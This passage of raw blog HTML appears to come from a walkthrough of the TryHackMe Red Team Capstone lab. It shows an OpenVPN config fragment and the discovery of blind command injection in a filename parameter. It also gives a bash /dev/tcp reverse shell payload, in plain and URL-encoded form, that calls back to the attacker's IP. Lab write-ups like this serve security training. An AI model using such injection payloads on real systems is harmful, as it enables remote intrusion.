style=\"color: #FFCB6B\">remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.113.12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1194<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">resolv-retry<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">infinite<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">nobind<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-key<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">persist-tun<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091081c6&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091081c6\" class=\"wp-block-image size-large 
wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"561\" data-attachment-id=\"470\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206114529\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?fit=1609%2C881&amp;ssl=1\" data-orig-size=\"1609,881\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206114529\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?fit=1024%2C561&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=1024%2C561&#038;ssl=1\" alt=\"\" class=\"wp-image-470\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=1024%2C561&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=300%2C164&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=768%2C421&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?resize=1536%2C841&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114529.png?w=1609&amp;ssl=1 1609w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Connecting with the <code>laura.wood<\/code> file, we did not see anything interesting in the output, but with <code>mohammad.ahmed<\/code> we see a couple of new IPs. 
These IPs are automatically added to our route.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091088d8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091088d8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"182\" data-attachment-id=\"471\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206114943\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?fit=1251%2C222&amp;ssl=1\" data-orig-size=\"1251,222\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206114943\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?fit=1024%2C182&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=1024%2C182&#038;ssl=1\" alt=\"\" class=\"wp-image-471\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=1024%2C182&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=300%2C53&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=768%2C136&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?w=1251&amp;ssl=1 1251w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09108eb1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09108eb1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"289\" data-attachment-id=\"472\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206115138\/\" 
data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?fit=1699%2C480&amp;ssl=1\" data-orig-size=\"1699,480\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206115138\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?fit=1024%2C289&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=1024%2C289&#038;ssl=1\" alt=\"\" class=\"wp-image-472\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=1024%2C289&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=300%2C85&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=768%2C217&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=1536%2C434&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?w=1699&amp;ssl=1 1699w\" 
sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"21-foothold-on-vpn-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Foothold on VPN Machine<\/mark><\/h4>\n\n\n\n<p>To understand how the web server fetches these files from the back end, we can capture the requests with <code>BurpSuite<\/code> and analyze the responses.<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091094a2&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091094a2\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"569\" data-attachment-id=\"474\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142202\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?fit=1844%2C1024&amp;ssl=1\" data-orig-size=\"1844,1024\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142202\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?fit=1024%2C569&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=1024%2C569&#038;ssl=1\" alt=\"\" class=\"wp-image-474\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=1024%2C569&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=300%2C167&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=768%2C426&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=1536%2C853&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?w=1844&amp;ssl=1 1844w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Looking at the response, it seems like the server appends the .ovpn extension to anything we search for. Carrying out a Path\/Directory Traversal attack might not be the best option for us here.<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09109aa1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09109aa1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"402\" data-attachment-id=\"475\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142350\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?fit=1257%2C493&amp;ssl=1\" data-orig-size=\"1257,493\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142350\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?fit=1024%2C402&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=1024%2C402&#038;ssl=1\" alt=\"\" class=\"wp-image-475\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=1024%2C402&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=300%2C118&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=768%2C301&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?w=1257&amp;ssl=1 1257w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The server does the same when we try to inject a command such as <code>id<\/code> or <code>whoami<\/code> into the <code>filename<\/code> parameter. After trying different command injection techniques, we found that it is vulnerable to blind <code>Command Injection<\/code>. 
When we inject the <code>sleep<\/code> command, the server waits for the number of seconds we specify before sending us the response, which confirms that the injected command is executed.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910a1aa&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910a1aa\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"592\" data-attachment-id=\"477\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142908\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?fit=1654%2C957&amp;ssl=1\" data-orig-size=\"1654,957\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142908\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?fit=1024%2C592&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=1024%2C592&#038;ssl=1\" alt=\"\" 
class=\"wp-image-477\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=1024%2C592&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=300%2C174&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=768%2C444&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=1536%2C889&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?w=1654&amp;ssl=1 1654w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910a96e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910a96e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"597\" data-attachment-id=\"476\" 
data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142824\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?fit=1647%2C960&amp;ssl=1\" data-orig-size=\"1647,960\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142824\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?fit=1024%2C597&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=1024%2C597&#038;ssl=1\" alt=\"\" class=\"wp-image-476\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=1024%2C597&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=300%2C175&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=768%2C448&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=1536%2C895&amp;ssl=1 
1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?w=1647&amp;ssl=1 1647w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Having confirmed that it is vulnerable to command injection, we can send a reverse shell payload and try to catch a shell on our attack machine.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle 
cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"bash -i &gt;&amp; \/dev\/tcp\/10.50.110.229\/443 0&gt;&amp;1\n\n# URL encoded\n%26%26+bash+-i+&gt;%26+\/dev\/tcp\/10.50.110.229\/443+0&gt;%261\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">bash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-i<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&gt;&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/dev\/tcp\/10.50.110.229\/443<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">0&gt;&amp;1<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #464B5D; font-style: italic\"># URL encoded<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">%26%26+bash+-i+&gt;%26+\/dev\/tcp\/10.50.110.229\/443+0&gt;%261<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will send the above payload and start a 
<code>Netcat<\/code> listener to catch the shell.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910b353&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910b353\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"246\" data-attachment-id=\"478\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206143204\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?fit=1943%2C466&amp;ssl=1\" data-orig-size=\"1943,466\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206143204\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?fit=1024%2C246&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=1024%2C246&#038;ssl=1\" alt=\"\" class=\"wp-image-478\" 
